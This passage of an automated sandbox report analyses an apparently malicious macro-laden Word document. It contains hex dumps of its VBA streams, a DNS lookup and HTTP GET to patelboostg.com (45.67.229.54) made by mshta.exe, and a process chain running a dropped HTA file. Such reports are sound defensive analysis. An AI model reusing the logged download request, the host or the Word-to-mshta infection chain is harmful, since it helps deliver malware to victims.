                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . t . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 . . . . . . . < . . . . . . . H . . . . . . . T . . . . . . . \\ . . . . . . . d . . . . . . . l . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 74 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 a4 00 00 00 04 00 00 00 b0 00 00 00 05 00 00 00 bc 00 00 00 06 00 00 00 c8 00 00 00 07 00 00 00 d4 00 00 00 08 00 00 00 e4 00 00 00 09 00 00 00 04 01 00 00
                Stream Path: 1Table, File Type: data, Stream Size: 7224
                General
                Stream Path:1Table
                File Type:data
                Stream Size:7224
                Entropy:5.92567062364
                Base64 Encoded:True
                Data ASCII:. . . . . . . . s . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
                Data Raw:0a 06 0f 00 12 00 01 00 73 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
                Stream Path: Data, File Type: data, Stream Size: 26648
                General
                Stream Path:Data
                File Type:data
                Stream Size:26648
                Entropy:7.93699752134
                Base64 Encoded:False
                Data ASCII:. h . . D . d . . . . . . . . . . . . . . . . . . . . . Z - . % . % . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D . . . . . . . . . . . . . . . . . . . C . . . . . . . A . . . . . . . . . . . . . . . . . . . . . . u . s . _ . . . . . . . . . . . . . . . b . . . . g . . . . . . . \\ u . V . . l o . + I . . . . \\ g . . . . . . D . . . . . . . . n . . T g . . . . . \\ u . V . . l o . + I . . . . P N G . . . . . . . . I H D R . . . . . . . . . . . . . . . . . . . . . g I F x N E
                Data Raw:18 68 00 00 44 00 64 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 5a 2d 20 0d 25 03 25 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 44 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 43 00 0b f0 20 00 00 00 04 41 01 00 00 00 05 c1 08 00 00 00 06 01 02 00 00 00 ff 01 00 00 08 00 75 00 73 00
                Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 398
                General
                Stream Path:Macros/PROJECT
                File Type:ASCII text, with CRLF line terminators
                Stream Size:398
                Entropy:5.34409853619
                Base64 Encoded:True
                Data ASCII:I D = " { 6 6 C 4 7 8 6 9 - 5 3 2 7 - 4 B B 0 - A 8 5 4 - 1 C 9 A 9 1 5 0 0 5 8 1 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . M o d u l e = m a i n . . N a m e = " a t J H O i j " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " A C A E 3 F 7 6 4 1 A 9 4 5 A 9 4 5 A 9 4 5 A 9 4 5 " . . D P B = " E 3 E 1 7 0 4 3 A 6 4 4 A 6 4 4 A 6 " . . G C = " 1 A 1 8 8 9 9 C C 1 9 D C 1 9 D 3 E " . . . . [ H o s t E x t
                Data Raw:49 44 3d 22 7b 36 36 43 34 37 38 36 39 2d 35 33 32 37 2d 34 42 42 30 2d 41 38 35 34 2d 31 43 39 41 39 31 35 30 30 35 38 31 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 6d 61 69 6e 0d 0a 4e 61 6d 65 3d 22 61 74 4a 48 4f 69 6a 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22 0d 0a 56
                Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 56
                General
                Stream Path:Macros/PROJECTwm
                File Type:data
                Stream Size:56
                Entropy:3.05665670746
                Base64 Encoded:False
                Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . m a i n . m . a . i . n . . . . .
                Data Raw:54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 6d 61 69 6e 00 6d 00 61 00 69 00 6e 00 00 00 00 00
                Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2896
                General
                Stream Path:Macros/VBA/_VBA_PROJECT
                File Type:data
                Stream Size:2896
                Entropy:4.3263453539
                Base64 Encoded:False
                Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 1 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c .
                Data Raw:cc 61 b2 00 00 03 00 ff 19 04 00 00 09 04 00 00 e3 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fe 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                Stream Path: Macros/VBA/__SRP_0, File Type: data, Stream Size: 1708
                General
                Stream Path:Macros/VBA/__SRP_0
                File Type:data
                Stream Size:1708
                Entropy:3.55295478383
                Base64 Encoded:False
                Data ASCII:. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * \\ C N o r m a l r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ Z . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . A . < . M . . @ . Y . . . J . . . . . . . . . . . . .
                Data Raw:93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 01 00 09 00 00 00 2a 5c 43 4e 6f 72 6d 61 6c 72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00
                Stream Path: Macros/VBA/__SRP_1, File Type: data, Stream Size: 241
                General
                Stream Path:Macros/VBA/__SRP_1
                File Type:data
                Stream Size:241
                Entropy:2.39835412071
                Base64 Encoded:False
                Data ASCII:r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . i 7 C o m p u t e r M o n i t o r . . . . . . . . . . . . . . . . m o u s e V i d e o T . . . . . . . . . . . . . . .
                Data Raw:72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 02 00 00 00 00 00 00 7e 7a 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 ff ff ff ff ff ff ff ff 06 00 00 00 00 00
                Stream Path: Macros/VBA/__SRP_2, File Type: data, Stream Size: 983
                General
                Stream Path:Macros/VBA/__SRP_2
                File Type:data
                Stream Size:983
                Entropy:2.01453026658
                Base64 Encoded:False
                Data ASCII:r U . . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . . . . . . . . . . . . . . . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` ) . . . . . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:72 55 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 50 00 00 00 00 00 00 00 00 00 00 00 04 00 04 00 00 00 00 00 01 00 01 00 00 00 01 00 71 07 00 00 00 00 00 00 00 00 00 00 a1 07 00 00 00 00 00 00 00 00 00 00 d1 07
                Stream Path: Macros/VBA/__SRP_3, File Type: data, Stream Size: 364
                General
                Stream Path:Macros/VBA/__SRP_3
                File Type:data
                Stream Size:364
                Entropy:2.2617201917
                Base64 Encoded:False
                Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . @ . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O . P . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O . O . P . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . .
                Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 78 00 00 00 08 00 40 00 e1 01 00 00 00 00 00 00 00 00 02 00 00 00 04 60 04 01 e1 0d ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
                Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 553
                General
                Stream Path:Macros/VBA/dir
                File Type:data
                Stream Size:553
                Entropy:6.34791185753
                Base64 Encoded:True
                Data ASCII:. % . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . . . . c . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s t e m 3 . 2 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E N o r m a l . . E N . C r . m . a Q . F . . . . . . . * , \\ C . . . . . . m . .
                Data Raw:01 25 b2 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 ef b5 c2 63 0e 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30
                Stream Path: WordDocument, File Type: data, Stream Size: 19522
                General
                Stream Path:WordDocument
                File Type:data
                Stream Size:19522
                Entropy:3.66495069994
                Base64 Encoded:False
                Data ASCII:. . . . U . . . . . . . . . . . . . . . . . . . . . . . j G . . . . b j b j . n . n . . . . . . . . . . . . . . . . . . . . . . . L . . . . . a . . . a j ? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . > . . . . . . . > . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:ec a5 c1 00 55 00 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 6a 47 00 00 0e 00 62 6a 62 6a eb 6e eb 6e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 04 16 00 2e 4c 00 00 89 04 e9 61 89 04 e9 61 6a 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

                Network Behavior

                Network Port Distribution

                TCP Packets

                TimestampSource PortDest PortSource IPDest IP
                Dec 31, 2021 12:48:50.565393925 CET4916580192.168.2.2245.67.229.54
                Dec 31, 2021 12:48:50.620126009 CET804916545.67.229.54192.168.2.22
                Dec 31, 2021 12:48:50.620259047 CET4916580192.168.2.2245.67.229.54
                Dec 31, 2021 12:48:50.694802046 CET4916580192.168.2.2245.67.229.54
                Dec 31, 2021 12:48:50.751616001 CET804916545.67.229.54192.168.2.22
                Dec 31, 2021 12:48:50.957160950 CET804916545.67.229.54192.168.2.22
                Dec 31, 2021 12:48:50.957293034 CET4916580192.168.2.2245.67.229.54
                Dec 31, 2021 12:48:55.483177900 CET4916580192.168.2.2245.67.229.54

                UDP Packets

                TimestampSource PortDest PortSource IPDest IP
                Dec 31, 2021 12:48:50.508971930 CET5216753192.168.2.228.8.8.8
                Dec 31, 2021 12:48:50.537548065 CET53521678.8.8.8192.168.2.22

                DNS Queries

                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                Dec 31, 2021 12:48:50.508971930 CET192.168.2.228.8.8.80x9c56Standard query (0)patelboostg.comA (IP address)IN (0x0001)

                DNS Answers

                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                Dec 31, 2021 12:48:50.537548065 CET8.8.8.8192.168.2.220x9c56No error (0)patelboostg.com45.67.229.54A (IP address)IN (0x0001)

                HTTP Request Dependency Graph

                • patelboostg.com

                HTTP Packets

                Session IDSource IPSource PortDestination IPDestination PortProcess
                0192.168.2.224916545.67.229.5480C:\Windows\SysWOW64\mshta.exe
                TimestampkBytes transferredDirectionData
                Dec 31, 2021 12:48:50.694802046 CET1OUTGET /frhe/L8dclCye7SQ5WTFva78FDxOjGBOF9iJro4DRgV/5inYIaSBt0KLfMB9kXwZBv6ZpTsny6/qAhIQjrAaLKJeTLQnbCarASpMADNe9u19Kylnkoreo7/SjqMh4eEx0Hx9b4h5e2fMcQgeIbFT/kKeSzfUaenwSFB/ISkVIHedx0p/49280/SruwcI68Yb5pVaVqfvyOHztDsbEuhGxtlV6bpgPIFvGFQ277/7FkN9pAcaWDfFlGNBeuaqGed8iDibaWexT/GyAAzLRbFAU1XErrU1F/vaci3?page=V8BBaQuem65&page=XYvyd0Dcrg6fJYLGHRVWp7s1tv&page=dvZwXcjcYCjBX8tPaALshiDAx85PEq&sid=10tOgWzOZj9xyAidNJAz3d9Ob0 HTTP/1.1
                Accept: */*
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: patelboostg.com
                Connection: Keep-Alive
                Dec 31, 2021 12:48:50.957160950 CET1INHTTP/1.1 200 OK
                Date: Fri, 31 Dec 2021 11:48:50 GMT
                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.2.34
                X-Powered-By: PHP/7.2.34
                Content-Length: 204
                Keep-Alive: timeout=5, max=100
                Connection: Keep-Alive
                Content-Type: text/html; charset=UTF-8
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 76 61 63 69 33 22 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL "vaci3" was not found on this server.</p></body></html>


                Code Manipulations

                Statistics

                Behavior

                Click to jump to process

                System Behavior

                General

                Start time:12:49:13
                Start date:31/12/2021
                Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                Wow64 process (32bit):false
                Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                Imagebase:0x13f8d0000
                File size:1423704 bytes
                MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:12:49:17
                Start date:31/12/2021
                Path:C:\Windows\explorer.exe
                Wow64 process (32bit):false
                Commandline:explorer i7Gigabyte.hta
                Imagebase:0xffa10000
                File size:3229696 bytes
                MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:12:49:18
                Start date:31/12/2021
                Path:C:\Windows\explorer.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                Imagebase:0xffa10000
                File size:3229696 bytes
                MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:12:49:18
                Start date:31/12/2021
                Path:C:\Windows\SysWOW64\mshta.exe
                Wow64 process (32bit):true
                Commandline:"C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\Documents\i7Gigabyte.hta"
                Imagebase:0x270000
                File size:13312 bytes
                MD5 hash:ABDFC692D9FE43E2BA8FE6CB5A8CB95A
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Disassembly

                Code Analysis

                Reset < >